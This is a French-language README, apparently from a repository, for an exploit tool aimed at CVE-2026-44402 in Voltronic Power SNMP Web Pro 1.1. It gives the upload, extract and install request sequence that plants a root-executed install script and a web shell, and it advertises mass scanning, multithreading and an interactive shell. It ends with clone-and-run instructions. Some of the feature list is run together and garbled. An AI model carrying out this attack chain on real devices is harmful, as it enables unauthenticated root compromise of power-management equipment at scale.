
Exploit pour CVE-2026-44402 ciblant Voltronic Power SNMP Web Pro 1.1, permettant l'exécution de code à distance non authentifiée via un téléchargement de firmware malveillant. Prend en charge le ciblage unique et le scan de masse avec shell interactif.
Exécution de code à distance critique non authentifiée (CVSS 9.8) — Voltronic Power SNMP Web Pro 1.1
Cet outil exploite CVE-2026-44402, une vulnérabilité dans l'appareil Voltronic Power SNMP Web Pro 1.1 qui permet à des attaquants non authentifiés de téléverser une archive de firmware malveillante et d'exécuter des commandes système en tant que root via le point de terminaison upload.cgi.
| Propriété | Valeur |
|---|
| ID CVE | CVE-2026-44402 |
| Score CVSS | 9.8 (Critique) |
| CWE | CWE-434 — Téléversement sans restriction de fichier de type dangereux |
| Produit concerné | Voltronic Power SNMP Web Pro 1.1 |
| Authentification requise | NON (non authentifiée) |
| Vecteur d'attaque | Réseau (à distance) |
| Privilège | RCE au niveau root |
La vulnérabilité existe dans la fonctionnalité de mise à jour du firmware (upload.cgi). Le point de terminaison :
Créer une archive malveillante
upgrade/install.sh — script d'installationupgrade/pwned.cgi — web shellTéléverser l'archive → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK" en cas de succèsExtraire l'archive → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK" en cas de succèsInstaller → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh est exécuté en tant que root"ACK" en cas de succèsWeb shell actif → POST /cgi-bin/pwned.cgi
cmd → RCE ! 🚀-u)-f targets.txt)-t 20) — traitement parallèle rapide--shell) avec prise en charge de cdurl | output--proxy)--timeout)-v) pour le débogagerequests et prompt_toolkit# Cloner le dépôt
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py